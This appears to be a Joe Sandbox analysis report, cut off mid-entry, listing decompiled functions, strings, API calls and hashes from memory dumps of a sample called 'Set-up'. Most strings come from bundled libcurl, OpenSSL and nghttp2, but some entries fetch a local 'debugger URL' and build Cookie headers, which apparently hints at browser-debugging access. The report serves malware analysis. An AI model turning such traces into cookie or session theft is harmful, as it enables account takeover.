Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID:
String ID: AUTH$CAPABILITY$Got unexpected imap-server response$L-IR$LOGINDISABLED$PREAUTH connection, already authenticated$SASL$STAR$STARTTLS$STARTTLS denied$STARTTLS not available.$TTLS
API String ID: 0-3171374047
Opcode ID: 1fa62d2e8fc00a79cdfe520be5d2a9d3014f130446b34085f09fe9d98c64be8f
Instruction ID: 620c243eaf3fa07e7271708298b3c366be0ddf4fae515958c6cfe0793770fb52
Opcode Fuzzy Hash: 1fa62d2e8fc00a79cdfe520be5d2a9d3014f130446b34085f09fe9d98c64be8f
Instruction Fuzzy Hash: C4B19071904321BBDB258B20E881BB977E4BF5570CF14113EEA497B242EB79DE40D752

Function 00DC20AD Relevance: 19.6, APIs: 3, Strings: 10, Instructions: 142COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00DC20D4
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00DC22D0

Strings

+N, xrefs: 00DC21B1
Failed to allocate memory for response., xrefs: 00DC20F1
GET request succeeded on attempt %d., xrefs: 00DC225D
All %d attempts to fetch debugger URL failed., xrefs: 00DC22EF
@, xrefs: 00DC21F2
Q, xrefs: 00DC2213
Attempt %d failed: %s, xrefs: 00DC229F
Failed to initialize curl., xrefs: 00DC213F
http://localhost:%d/json, xrefs: 00DC2170
d, xrefs: 00DC2178

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: freemalloc
String ID: +N$@$All %d attempts to fetch debugger URL failed.$Attempt %d failed: %s$Failed to allocate memory for response.$Failed to initialize curl.$GET request succeeded on attempt %d.$Q$d$http://localhost:%d/json
API String ID: 3061335427-1249806554
Opcode ID: b7aef9e61c74ad4df63e3bd862762c7a3030509d184cda676b063b2f4b15f30c
Instruction ID: ba1e0fd660ea6addba28ea42e60b8798b923a561d8992e6469a87d56897067d1
Opcode Fuzzy Hash: b7aef9e61c74ad4df63e3bd862762c7a3030509d184cda676b063b2f4b15f30c
Instruction Fuzzy Hash: 146156B490531A9FDB00EFA8D485BAEBBF0FF44314F11881DE594A7341D77999848FA2

Function 00E161C0 Relevance: 18.2, APIs: 4, Strings: 8, Instructions: 234stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,127.0.0.1,?,?,00000000,00E13DA5,?,?,?), ref: 00E16267
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,::1,?,?,?,?,00000000,00E13DA5,?,?,?), ref: 00E16279
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00E1631C
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00E13DA5,?,?), ref: 00E16329

Strings

Cookie, xrefs: 00E161DD
Cookie: , xrefs: 00E162F8, 00E16403
::1, xrefs: 00E16273
Restricted outgoing cookies due to header size, '%s' not sent, xrefs: 00E16492
%s%s=%s, xrefs: 00E16363
%s%s, xrefs: 00E163BA
127.0.0.1, xrefs: 00E16261
localhost, xrefs: 00E16250

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: strcmpstrlen
String ID: %s%s$%s%s=%s$127.0.0.1$::1$Cookie$Cookie: $Restricted outgoing cookies due to header size, '%s' not sent$localhost
API String ID: 3853617425-1910649647
Opcode ID: 680515b2d845f5c4be9a3781f04df9cf5830c04e57414ea225be784a85e0b2ab
Instruction ID: 779de9e484cc8617104a795f3fc7d77154e2d010be9947842fd30342f5055976
Opcode Fuzzy Hash: 680515b2d845f5c4be9a3781f04df9cf5830c04e57414ea225be784a85e0b2ab
Instruction Fuzzy Hash: 87710371B043016BDB209A21AC42BEBB695BF9074CF05A03CFD69A7352FB71EC958691

Function 00F74580 Relevance: 18.2, APIs: 2, Strings: 10, Instructions: 159stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,00E38C0E,?), ref: 00F745E3
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dynamic,?,?,00E38C0E,?), ref: 00F7460A

Strings

crypto/engine/eng_list.c, xrefs: 00F746DF, 00F74704, 00F74750
DIR_ADD, xrefs: 00F74683
dynamic, xrefs: 00F74604, 00F74633
LOAD, xrefs: 00F746BA
/data/curl-i686/lib/engines-3, xrefs: 00F7462B, 00F74682
ENGINE_by_id, xrefs: 00F746D5, 00F746FA, 00F74746
LIST_ADD, xrefs: 00F746A0
id=%s, xrefs: 00F7475E
OPENSSL_ENGINES, xrefs: 00F7461C
DIR_LOAD, xrefs: 00F7466A

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: strcmp
String ID: /data/curl-i686/lib/engines-3$DIR_ADD$DIR_LOAD$ENGINE_by_id$LIST_ADD$LOAD$OPENSSL_ENGINES$crypto/engine/eng_list.c$dynamic$id=%s
API String ID: 1004003707-1524119518
Opcode ID: caa1bd55e0d8e89e5c91d39083fe7eeca84fdd591bbd9e1bfcebe520f0c30de6
Instruction ID: ae1f004f3a2133a90fefe32b618285371eb60ed0ef0fee8d11634834a40e0a93
Opcode Fuzzy Hash: caa1bd55e0d8e89e5c91d39083fe7eeca84fdd591bbd9e1bfcebe520f0c30de6
Instruction Fuzzy Hash: 0E41B575F8031176E63036656D43F2632D84B52B54F2E802BFD0C65297FBA9F911B1A3

Function 00DC63F0 Relevance: 17.8, APIs: 3, Strings: 7, Instructions: 255fileCOMMON

Download Yara Rule

APIs

fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# Your HSTS cache. https://curl.se/docs/hsts.html# This file was generated by libcurl! Edit at your own risk.,0000006F,00000001,?), ref: 00DC6467

Strings

unlimited, xrefs: 00DC64A1
# Your HSTS cache. https://curl.se/docs/hsts.html# This file was generated by libcurl! Edit at your own risk., xrefs: 00DC6462
mite, xrefs: 00DC6688
%s%s "%d%02d%02d %02d:%02d:%02d", xrefs: 00DC6540
%s%s "%s", xrefs: 00DC64AA
hsts.c, xrefs: 00DC656B, 00DC65CF
%d%02d%02d %02d:%02d:%02d, xrefs: 00DC66D5

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: fwrite
String ID: # Your HSTS cache. https://curl.se/docs/hsts.html# This file was generated by libcurl! Edit at your own risk.$%d%02d%02d %02d:%02d:%02d$%s%s "%d%02d%02d %02d:%02d:%02d"$%s%s "%s"$hsts.c$mite$unlimited
API String ID: 3559309478-3911685517
Opcode ID: 7b2c934de466000d7d55cd7af1ddd662fa622b8379cdf96553e9af1ece9b41c6
Instruction ID: 463a0f660b5281787fb95ea3282a33d41f2a9939704846ff1cec6e74dab1026b
Opcode Fuzzy Hash: 7b2c934de466000d7d55cd7af1ddd662fa622b8379cdf96553e9af1ece9b41c6
Instruction Fuzzy Hash: 4F81D2B2A08302ABEB159E24DC41F2BB7E5EF94714F18462CF94987252E731DD14CBB2

Function 00E66210 Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 184COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(stream->outq_idx + 1 >= npopped,nghttp3_stream.c,000003CE,?,00000000,00E3DB9C,?,00E63BB8,00000000,?,?), ref: 00E66433

Strings

nghttp3_stream.c, xrefs: 00E66429, 00E66487, 00E66496, 00E664AB, 00E664C0
stream_pop_outq_entry, xrefs: 00E6647D
stream->outq_idx + 1 >= npopped, xrefs: 00E6642E
chunk->end == tbuf->buf.end, xrefs: 00E6649B
chunk->begin == tbuf->buf.begin, xrefs: 00E664C5
nghttp3_ringbuf_len(chunks), xrefs: 00E664B0

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: _assert
String ID: chunk->begin == tbuf->buf.begin$chunk->end == tbuf->buf.end$nghttp3_ringbuf_len(chunks)$nghttp3_stream.c$stream->outq_idx + 1 >= npopped$stream_pop_outq_entry
API String ID: 1222420520-1470553442
Opcode ID: 967496d427a499413b107a75dddbef3da30fa71cd89b37adb21f33aa9f83fc58
Instruction ID: f09e6b833445aa19c23f603d41b7639a434cfa607aafd50246827294d1a8c5a2
Opcode Fuzzy Hash: 967496d427a499413b107a75dddbef3da30fa71cd89b37adb21f33aa9f83fc58
Instruction Fuzzy Hash: A5718FB0654344AFCB25DF24E986BAEB7E1FF84748F00552CF849A7361EB30A950CB42

Function 00DDE760 Relevance: 16.9, APIs: 1, Strings: 10, Instructions: 448COMMON

Download Yara Rule

APIs

Part of subcall function 00DE5EB0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00DE5ED4

Part of subcall function 00E04F40: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 00E04F9E

atoi.API-MS-WIN-CRT-CONVERT-L1-1-0(?), ref: 00DDEA9B

Part of subcall function 00DE06F0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,00DE5663,?), ref: 00DE06F9

Strings

Switch to %s, xrefs: 00DDEDA3
transfer.c, xrefs: 00DDE7F2, 00DDE97C, 00DDEA7D, 00DDEAA5, 00DDEAE1, 00DDEB46, 00DDEB92, 00DDEBA8, 00DDEBCA, 00DDEC43
Clear auth, redirects scheme from %s to %s, xrefs: 00DDEB84
Maximum (%ld) redirects followed, xrefs: 00DDEC11
HEAD, xrefs: 00DDED9A, 00DDEDA2
Clear auth, redirects to port from %u to %u, xrefs: 00DDEB1B
GET, xrefs: 00DDED95
Issue another request to this URL: '%s', xrefs: 00DDECA4
The redirect target URL could not be parsed: %s, xrefs: 00DDE9E1
Switch from POST to GET, xrefs: 00DDED2B

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: strlen$atoistrcpy
String ID: Clear auth, redirects scheme from %s to %s$Clear auth, redirects to port from %u to %u$GET$HEAD$Issue another request to this URL: '%s'$Maximum (%ld) redirects followed$Switch from POST to GET$Switch to %s$The redirect target URL could not be parsed: %s$transfer.c
API String ID: 2444498485-4197959747
Opcode ID: 22f7f65cacab632a2e22c2f1daacdc848cd832b867b624a7a78f124439a5baaa
Instruction ID: d32c4d9e1cf13b13ec2bf494869c76e2224417c87defcb6822f4ff99793fc477
Opcode Fuzzy Hash: 22f7f65cacab632a2e22c2f1daacdc848cd832b867b624a7a78f124439a5baaa
Instruction Fuzzy Hash: 08F1DF75A003056BEB20AE14DC86BA63B95AF50718F0C447AFC48AE3D7EB71E954C771

Function 00FBA300 Relevance: 16.9, APIs: 2, Strings: 9, Instructions: 446stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PRIVATE KEY), ref: 00FBA61C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ENCRYPTED PRIVATE KEY), ref: 00FBA632

Part of subcall function 00FBA0B0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,00FBA654,?,PRIVATE KEY), ref: 00FBA0BD
Part of subcall function 00FBA0B0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,PRIVATE KEY), ref: 00FBA0C8
Part of subcall function 00FBA0B0: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,PRIVATE KEY), ref: 00FBA0DF

Part of subcall function 00F338A0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00F3397E

Strings

PARAMETERS, xrefs: 00FBA5CF
crypto/pem/pem_pkey.c, xrefs: 00FBA555, 00FBA802, 00FBA831, 00FBA85C, 00FBA872
pem_read_bio_key_legacy, xrefs: 00FBA7F8, 00FBA827
pem_read_bio_key_decoder, xrefs: 00FBA54E
PEM, xrefs: 00FBA3FF
PRIVATE KEY, xrefs: 00FBA616, 00FBA649
ENCRYPTED PRIVATE KEY, xrefs: 00FBA62C
ANY PRIVATE KEY, xrefs: 00FBA6B4
PUBLIC KEY, xrefs: 00FBA5D4, 00FBA5F1

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: strcmpstrlen
String ID: ANY PRIVATE KEY$ENCRYPTED PRIVATE KEY$PARAMETERS$PEM$PRIVATE KEY$PUBLIC KEY$crypto/pem/pem_pkey.c$pem_read_bio_key_decoder$pem_read_bio_key_legacy
API String ID: 3853617425-3686562516
Opcode ID: 6aebec362207d573830175dbe8df5380a2a79091d6d6a528a90ffc7579599410
Instruction ID: aa8e70b9ad0ba8373c1e3cdb5d464abf8b9178d61a727ffb8ff36fac6e8b28a7
Opcode Fuzzy Hash: 6aebec362207d573830175dbe8df5380a2a79091d6d6a528a90ffc7579599410
Instruction Fuzzy Hash: 49D13EB6E043017BE7207B61AC03F9B77D89FD4754F180429FD48A6183FA75E914AAA3

Function 00EAC290 Relevance: 16.8, APIs: 1, Strings: 10, Instructions: 318COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000010,?,00000100), ref: 00EAC60E

Strings

Unable to send FXP_OPEN*, xrefs: 00EAC45B
Unable to allocate memory for FXP_OPEN or FXP_OPENDIR packet, xrefs: 00EAC444
Timeout waiting for status message, xrefs: 00EAC4FB
feWould block waiting for status message, xrefs: 00EAC4A6
Too small FXP_HANDLE, xrefs: 00EAC582, 00EAC675
Would block sending FXP_OPEN or FXP_OPENDIR command, xrefs: 00EAC410
Too small FXP_STATUS, xrefs: 00EAC517
Response too small, xrefs: 00EAC4E3
Unable to allocate new SFTP handle structure, xrefs: 00EAC646
Failed opening remote file, xrefs: 00EAC531

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: memcpy
String ID: Failed opening remote file$Response too small$Timeout waiting for status message$Too small FXP_HANDLE$Too small FXP_STATUS$Unable to allocate memory for FXP_OPEN or FXP_OPENDIR packet$Unable to allocate new SFTP handle structure$Unable to send FXP_OPEN*$Would block sending FXP_OPEN or FXP_OPENDIR command$feWould block waiting for status message
API String ID: 3510742995-1499184223
Opcode ID: 3babe7943875e44a9f9da02cfbab881be666e787880d370b8bbccbe5f5cc0743
Instruction ID: 350317693eba3bb3d78d391d02b913449528a268130f43e7e1cd940115f34f96
Opcode Fuzzy Hash: 3babe7943875e44a9f9da02cfbab881be666e787880d370b8bbccbe5f5cc0743
Instruction Fuzzy Hash: E1B1F5B09047419BDB10CF28DC45B6B77E4FF8A31CF145A2CF456AA292E770E918CB92

Function 00E4E280 Relevance: 16.2, APIs: 1, Strings: 8, Instructions: 453COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(nghttp2_is_fatal(rv),nghttp2_session.c,00001DE5), ref: 00E4E54E

Strings

PUSH_PROMISE: push disabled, xrefs: 00E4E5CE
PUSH_PROMISE: stream_id == 0, xrefs: 00E4E621
PUSH_PROMISE: invalid stream_id, xrefs: 00E4E695
nghttp2_session.c, xrefs: 00E4E544
PUSH_PROMISE: stream closed, xrefs: 00E4E86B
nghttp2_is_fatal(rv), xrefs: 00E4E549
PUSH_PROMISE: stream in idle, xrefs: 00E4E72C
PUSH_PROMISE: invalid promised_stream_id, xrefs: 00E4E785

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: _assert
String ID: PUSH_PROMISE: invalid promised_stream_id$PUSH_PROMISE: invalid stream_id$PUSH_PROMISE: push disabled$PUSH_PROMISE: stream closed$PUSH_PROMISE: stream in idle$PUSH_PROMISE: stream_id == 0$nghttp2_is_fatal(rv)$nghttp2_session.c
API String ID: 1222420520-2595712376
Opcode ID: 3f3f6baf1cf45564d01cfaca89ae65dd89e97ff77de3aebc99ff684044a15cc0
Instruction ID: 1ff9113cfa8ae2451e9692c8ee48aebed68f3c62708f4564bdc3b7a7cad04ba9
Opcode Fuzzy Hash: 3f3f6baf1cf45564d01cfaca89ae65dd89e97ff77de3aebc99ff684044a15cc0
Instruction Fuzzy Hash: 0EF12930A04701ABEB304A38AC05BBB7BD5BF9531DF04196CF8A9B63D2E766D850CB51

Function 00E4A530 Relevance: 16.2, APIs: 4, Strings: 5, Instructions: 420COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(stream->state == NGHTTP2_STREAM_IDLE,nghttp2_session.c,00000528,?,?,-00000264,?,00000000,?,00000004,?), ref: 00E4A93D
